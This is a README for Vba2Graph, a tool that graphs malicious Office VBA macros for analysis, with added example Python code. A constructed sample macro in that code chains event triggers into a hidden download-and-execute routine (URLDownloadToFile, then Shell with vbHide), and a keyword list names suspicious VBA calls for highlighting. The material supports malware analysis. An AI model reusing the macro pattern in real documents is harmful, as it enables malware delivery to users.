MalwareCantFly / Vba2graph

Licence: epl-2.0
Vba2Graph - Generate call graphs from VBA code, for easier analysis of malicious documents.

Vba2Graph

A tool for security researchers who waste their time analyzing malicious Office macros.

Generates a VBA call graph, with potentially malicious keywords highlighted.

Allows for quick analysis of malicious macros and easy understanding of the execution flow.

@MalwareCantFly

Features

  • Keyword highlighting
  • VBA Properties support
  • External function declaration support
  • Tricky macros with "_Change" execution triggers
  • Fancy color schemes!

Pros

    ✓ Pretty fast

    ✓ Works well on most malicious macros observed in the wild

Cons

    ✗ Static (dynamically resolved calls, e.g. a procedure name built at run time, are not recognized)
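To make the features and the "static" caveat above concrete, here is a minimal call-graph builder written for this page. It is an added example, not vba2graph's own implementation: the regexes, the keyword list, the treatment of `Ctl.Text = ...` as a trigger of `Ctl_Change`, and the sample macro (a constructed stand-in for the Resize → TextBox_Change chain the Examples section describes, with placeholder strings only) are all this example's assumptions. It resolves direct calls, Declare'd external functions and `_Change` trigger edges, highlights keywords, and emits Graphviz DOT; a callee passed to `Application.Run` as a run-time string is flagged but deliberately left unresolved, which is exactly the limitation listed under Cons.

```python
"""Minimal static VBA call-graph builder (added example, not vba2graph's code)."""
import re
from collections import defaultdict

# Highlight and dynamic-dispatch lists are this example's own choices.
SUSPICIOUS = ("Shell", "Environ", "CreateObject", "GetObject", "WScript.Shell",
              "URLDownloadToFile", "StrReverse", "ChrW", "Xor", "Kill")
DYNAMIC_CALL = ("Application.Run", "CallByName")   # callee is a run-time string

_CONT = re.compile(r"[ \t]*_[ \t]*\r?\n[ \t]*")    # VBA line continuation
_PROC_START = re.compile(r"^\s*(?:(?:Public|Private|Friend)\s+)?(?:Static\s+)?"
                         r"(?:Sub|Function|Property\s+(?:Get|Let|Set))\s+(\w+)", re.I)
_PROC_END = re.compile(r"^\s*End\s+(?:Sub|Function|Property)\b", re.I)
_DECLARE = re.compile(r'^\s*(?:(?:Public|Private)\s+)?Declare\s+(?:PtrSafe\s+)?'
                      r'(?:Sub|Function)\s+(\w+)\s+Lib\s+"([^"]+)"', re.I)
# "Ctl.Text = ..." or "Ctl.Value = ..." at statement start fires Ctl_Change.
_CHANGE_TRIGGER = re.compile(r"^\s*(\w+)\.(?:Text|Value)\s*=", re.I | re.M)

# Constructed sample, modelled on a Resize -> TextBox_Change trigger chain.
# Placeholder strings only; this is not real malware.
SAMPLE_VBA = r'''
Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" _
    (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, _
     ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long

Private Sub UserForm_Resize()
    TextBox1.Text = "x"                ' writing the control fires TextBox1_Change
End Sub

Private Sub TextBox1_Change()
    TextBox2.Text = Decode("redlohecalp")
End Sub

Private Sub TextBox2_Change()
    Application.Run Decode("hcteF")    ' callee name is built at run time
End Sub

Private Function Decode(s As String) As String
    Decode = StrReverse(s)
End Function

Private Sub Fetch()
    Dim p As String
    p = Environ("TEMP") & "\stage.exe"
    URLDownloadToFile 0, TextBox2.Text, p, 0, 0
    Shell p, vbHide
End Sub
'''


def _strip_comment(line):
    """Drop a trailing ' comment, ignoring apostrophes inside string literals."""
    in_str = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_str = not in_str
        elif ch == "'" and not in_str:
            return line[:i]
    return line


def parse_vba(src):
    """Return (procs, externals): proc name -> body lines, Declare name -> DLL."""
    procs, externals, current = {}, {}, None
    for line in _CONT.sub(" ", src).splitlines():
        code = _strip_comment(line)
        decl = _DECLARE.match(code)
        start = _PROC_START.match(code)
        if decl:
            externals[decl.group(1)] = decl.group(2)
        elif current is None and start:
            current = start.group(1)
            procs[current] = []
        elif current is not None:
            if _PROC_END.match(code):
                current = None
            else:
                procs[current].append(code)
    return procs, externals


def build_graph(src):
    """Return (procs, externals, edges, flags); edges are (caller, callee) pairs."""
    procs, externals = parse_vba(src)
    names = {n.lower(): n for n in list(procs) + list(externals)}
    edges, flags = set(), defaultdict(set)
    for proc, body in procs.items():
        text = re.sub(r'"[^"]*"', '""', "\n".join(body))   # blank out string literals
        for tok in re.findall(r"\b\w+\b", text):           # direct call edges
            target = names.get(tok.lower())
            if target and target != proc:
                edges.add((proc, target))
        for ctl in _CHANGE_TRIGGER.findall(text):          # event-trigger edges
            target = names.get(ctl.lower() + "_change")
            if target:
                edges.add((proc, target))
        for kw in SUSPICIOUS + DYNAMIC_CALL:               # keyword highlighting
            if re.search(r"\b" + re.escape(kw) + r"\b", text, re.I):
                flags[proc].add(kw)
    return procs, externals, edges, dict(flags)


def entry_points(procs, edges):
    """Procedures nothing calls: event handlers, Auto* macros, or dynamic targets."""
    callees = {dst for _, dst in edges}
    return sorted(p for p in procs if p not in callees)


def to_dot(procs, externals, edges, flags):
    """Emit Graphviz DOT; render with: dot -Tpng graph.dot -o graph.png"""
    out = ["digraph vba {", "  rankdir=LR;", "  node [shape=box];"]
    entries = set(entry_points(procs, edges))
    for p in procs:
        label = p + ("\\n" + " ".join(sorted(flags[p])) if p in flags else "")
        attrs = ['label="%s"' % label]
        if p in flags:
            attrs.append('style=filled fillcolor="#f4a6a6"')
        if p in entries:
            attrs.append("peripheries=2")     # double border = entry point
        out.append('  "%s" [%s];' % (p, " ".join(attrs)))
    for name, dll in externals.items():
        out.append('  "%s" [label="%s\\n(%s)" shape=ellipse style=dashed];' % (name, name, dll))
    for caller, callee in sorted(edges):
        out.append('  "%s" -> "%s";' % (caller, callee))
    out.append("}")
    return "\n".join(out)


if __name__ == "__main__":
    print(to_dot(*build_graph(SAMPLE_VBA)))
```

Run it and feed the output to `dot -Tpng`: `UserForm_Resize` chains into `TextBox1_Change` and `TextBox2_Change`, but `Fetch` (the node carrying `Shell`, `Environ` and the `urlmon` import) shows up as a second, unconnected entry point. That orphan is the tell: when a highlighted procedure has no caller and some other node is flagged with `Application.Run` or `CallByName`, the link was resolved at run time and has to be recovered by hand.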

Examples

Example 1:

Trickbot downloader - utilizes object Resize event as initial trigger, followed by TextBox_Change triggers.

Example 1

Example 2:

Example 2

Check out the Examples folder for more cases.

Installation

Install oletools:

https://github.com/decalage2/oletools/wiki/Install

Install Python Requirements

pip3 install -r requirements.txt

Install Graphviz

Windows

Install Graphviz:

https://graphviz.gitlab.io/download/#windows

Add "dot.exe" to PATH env variable or just:

set PATH=%PATH%;C:\Program Files (x86)\Graphviz2.38\bin

Mac

brew install graphviz

Ubuntu

sudo apt-get install graphviz

Arch

sudo pacman -S graphviz

Usage

usage: vba2graph.py [-h] [-o OUTPUT] [-c {0,1,2,3}] (-i INPUT | -f FILE)

optional arguments:
  -h, --help            show this help message and exit
  -o OUTPUT, --output OUTPUT
                        output folder (default: "output")
  -c {0,1,2,3}, --colors {0,1,2,3}
                        color scheme number [0, 1, 2, 3] (default: 0 - B&W)
  -i INPUT, --input INPUT
                        olevba generated file or .bas file
  -f FILE, --file FILE  Office file with macros

Usage Examples (All Platforms)

Please note that a Python 2 release is available in the Releases section, but it is no longer supported.

# Generate call graph directly from an Office file with macros [tnx @doomedraven]
python3 vba2graph.py -f malicious.doc -c 2    

# Generate vba code using olevba then pipe it to vba2graph
olevba3 malicious.doc | python3 vba2graph.py -c 1

# Generate call graph from VBA code
python3 vba2graph.py -i vba_code.bas -o output_folder

Output

You'll get 4 folders in your output folder:

  • png: the actual graph image you are looking for
  • svg: same graph image, just in vector graphics
  • dot: the dot file which was used to create the graph image
  • bas: the VBA functions code that was recognized by the script (for debugging)

Batch Processing

Mac/Linux:

The batch.sh script runs olevba and vba2graph on an input folder of malicious docs.

It deletes the output directory first, so use it with caution.
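For batch runs that must not wipe previous results, here is a small driver written for this page rather than the project's batch.sh. It only uses the `-f`, `-o` and `-c` flags documented under Usage; the extension list, the per-document output sub-folder layout, the skip-if-already-processed check (it looks for the `png` folder the Output section describes), the per-file timeout, and the path to `vba2graph.py` are this example's assumptions.

```python
"""Non-destructive batch driver for vba2graph (added example, not the project's batch.sh)."""
import os
import subprocess
import sys

# Office container types that can carry VBA; this suffix list is the example's choice.
MACRO_SUFFIXES = (".doc", ".docm", ".dot", ".dotm", ".xls", ".xlsm", ".xlsb", ".ppt", ".pptm")


def list_macro_docs(input_dir):
    """Sorted paths of files under input_dir whose extension suggests macros."""
    return sorted(os.path.join(input_dir, f) for f in os.listdir(input_dir)
                  if f.lower().endswith(MACRO_SUFFIXES))


def build_commands(paths, output_dir, color_scheme=0, vba2graph="vba2graph.py"):
    """Return [(argv, per_document_output_dir)] using the CLI flags the page documents."""
    cmds = []
    for path in paths:
        # One sub-folder per document so the png/svg/dot/bas folders never collide.
        out_dir = os.path.join(output_dir, os.path.basename(path))
        argv = [sys.executable, vba2graph, "-f", path, "-o", out_dir, "-c", str(color_scheme)]
        cmds.append((argv, out_dir))
    return cmds


def run_batch(input_dir, output_dir, color_scheme=0, timeout=120, vba2graph="vba2graph.py"):
    """Process every document, continuing past failures. Returns {path: status}.

    Existing output is never deleted; a document whose png folder already exists
    is skipped, so an interrupted run can simply be restarted.
    """
    os.makedirs(output_dir, exist_ok=True)
    results = {}
    docs = list_macro_docs(input_dir)
    for argv, out_dir in build_commands(docs, output_dir, color_scheme, vba2graph):
        path = argv[3]
        if os.path.isdir(os.path.join(out_dir, "png")):
            results[path] = "skipped (already processed)"
            continue
        try:
            # Untrusted input: a malformed document may hang or crash the parser,
            # so bound the run time and keep going rather than abort the whole batch.
            proc = subprocess.run(argv, capture_output=True, text=True, timeout=timeout)
            results[path] = "ok" if proc.returncode == 0 else "failed: " + proc.stderr.strip()[-200:]
        except subprocess.TimeoutExpired:
            results[path] = "timeout"
    return results


if __name__ == "__main__":
    in_dir, out_dir = sys.argv[1], sys.argv[2] if len(sys.argv) > 2 else "output"
    for doc, status in run_batch(in_dir, out_dir, color_scheme=2).items():
        print("%-60s %s" % (doc, status))
```

Usage: `python3 batch_vba2graph.py samples/ output/` from the directory containing vba2graph.py (or pass `vba2graph=` with a full path). Run it from a machine that is already isolated for malware handling; the script never opens the documents itself, but vba2graph and olevba do parse them.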

License

The code in this project is licensed under the EPL-2.0 License.

This project uses the following third-party open-source tools and libraries. Please note their respective licenses.
